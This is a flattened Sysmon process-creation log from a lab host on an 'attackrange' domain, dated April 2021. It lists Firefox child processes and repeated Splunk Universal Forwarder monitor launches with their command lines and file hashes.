"C:\Program Files\Mozilla Firefox\browser" - 3312 "\\.\pipe\gecko-crash-server-pipe.3312" 4828 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000023664Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:34.469{A8622C2F-45D6-6078-B405-00000000AE01}2316C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3312.27.1149988546\1438748659" -childID 4 -isForBrowser -prefsHandle 4568 -prefMapHandle 4564 -prefsLen 8085 -prefMapSize 235145 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3312 "\\.\pipe\gecko-crash-server-pipe.3312" 4528 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000023537Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:33.988{A8622C2F-45D5-6078-B305-00000000AE01}5732C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3312.20.1460346272\1721553792" -childID 3 -isForBrowser -prefsHandle 3956 -prefMapHandle 3936 -prefsLen 7312 -prefMapSize 235145 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3312 "\\.\pipe\gecko-crash-server-pipe.3312" 3548 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000023457Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:33.764{A8622C2F-45D5-6078-B205-00000000AE01}4392C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3312.13.379808757\1986658952" -childID 2 -isForBrowser -prefsHandle 3260 -prefMapHandle 3292 -prefsLen 7241 -prefMapSize 235145 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3312 "\\.\pipe\gecko-crash-server-pipe.3312" 3264 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000023387Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:33.469{A8622C2F-45D5-6078-B105-00000000AE01}936C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3312.6.567730962\620123395" -childID 1 -isForBrowser -prefsHandle 2092 -prefMapHandle 2088 -prefsLen 410 -prefMapSize 235145 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3312 "\\.\pipe\gecko-crash-server-pipe.3312" 2104 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000023344Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:33.180{A8622C2F-45D5-6078-B005-00000000AE01}6828C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3312.0.1988985872\1504275470" -parentBuildID 20210318103112 -prefsHandle 1408 -prefMapHandle 1376 -prefsLen 1 -prefMapSize 235145 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3312 "\\.\pipe\gecko-crash-server-pipe.3312" 1516 gpuC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92MediumMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000023308Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:31.898{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92MediumMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AD05-00000000AE01}4868C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000023298Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:31.874{A8622C2F-45D3-6078-AD05-00000000AE01}4868C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000023281Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:23.367{A8622C2F-45CB-6078-AC05-00000000AE01}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023267Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:21.945{A8622C2F-45C9-6078-AB05-00000000AE01}4424C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023256Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:21.273{A8622C2F-45C9-6078-AA05-00000000AE01}6060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023246Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:20.383{A8622C2F-45C8-6078-A905-00000000AE01}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023236Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:18.680{A8622C2F-45C6-6078-A805-00000000AE01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023227Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:18.008{A8622C2F-45C6-6078-A705-00000000AE01}6296C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023217Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:17.133{A8622C2F-45C5-6078-A605-00000000AE01}6572C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023111Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:54:23.353{A8622C2F-458F-6078-A505-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023099Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:54:21.838{A8622C2F-458D-6078-A405-00000000AE01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023086Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:54:21.259{A8622C2F-458D-6078-A305-00000000AE01}4156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023076Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:54:20.384{A8622C2F-458C-6078-A205-00000000AE01}5680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023066Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:54:18.681{A8622C2F-458A-6078-A105-00000000AE01}2708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023057Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:54:18.009{A8622C2F-458A-6078-A005-00000000AE01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023047Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:54:17.134{A8622C2F-4589-6078-9F05-00000000AE01}6596C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022962Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:53:23.339{A8622C2F-4553-6078-9E05-00000000AE01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022931Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:53:21.932{A8622C2F-4551-6078-9D05-00000000AE01}7076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022919Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:53:21.261{A8622C2F-4551-6078-9C05-00000000AE01}2768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022905Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:53:20.370{A8622C2F-4550-6078-9B05-00000000AE01}828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022884Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:53:18.682{A8622C2F-454E-6078-9A05-00000000AE01}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022875Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:53:18.011{A8622C2F-454E-6078-9905-00000000AE01}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022866Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:53:17.136{A8622C2F-454D-6078-9805-00000000AE01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022779Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:52:23.324{A8622C2F-4517-6078-9705-00000000AE01}1328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022766Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:52:21.934{A8622C2F-4515-6078-9605-00000000AE01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022754Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:52:21.262{A8622C2F-4515-6078-9505-00000000AE01}2072C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022745Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:52:20.402{A8622C2F-4514-6078-9405-00000000AE01}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 